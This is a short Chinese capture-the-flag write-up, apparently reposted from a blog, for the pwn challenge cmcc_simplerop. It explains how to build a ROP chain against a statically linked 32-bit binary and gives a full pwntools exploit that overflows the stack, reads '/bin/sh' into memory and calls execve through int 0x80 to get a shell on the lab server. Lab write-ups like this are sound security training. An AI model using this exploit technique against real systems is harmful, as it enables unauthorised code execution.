【pwn】cmcc_simplerop --rop链的构造

发布时间:2024年01月12日

程序保护情况检查

32位程序,堆栈不可执行

主函数:

左边又是一堆函数,file看一下

发现是静态链接,那ret2libc不用考虑了,接着看一下有没有int 80

那可以考虑利用rop链调用execve函数,用系统调用的函数参数是存在寄存器中的,但是本程序找不到/bin/sh的字符串,可以利用read函数读入/bin/sh字符串

然后就是找gadget

exp:

from pwn import *

context(os='linux',arch='i386',log_level='debug')

io=remote("node5.buuoj.cn",26245)

read_plt=0x0806CD50

int_addr=0x080493e1

bin_addr=0x080EA825

pop_edx_ecx_ebx=0x0806e850

pop_eax=0x080bae06

payload=b'a'*(0x1c+0x4)+p32(read_plt)+p32(pop_edx_ecx_ebx)+p32(0)+p32(bin_addr)+p32(8)

payload+=p32(pop_eax)+p32(11)+p32(pop_edx_ecx_ebx)+p32(0)+p32(0)+p32(bin_addr)+p32(int_addr)

#第一个payload的pop_edx_ecx_ebx是为了将栈中的三个数据弹出,执行pop_eax

io.recvuntil(b"Your input :")

io.send(payload)

io.sendline(b"/bin/sh\x00")

io.interactive()

文章来源:https://blog.csdn.net/question55/article/details/135562377
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。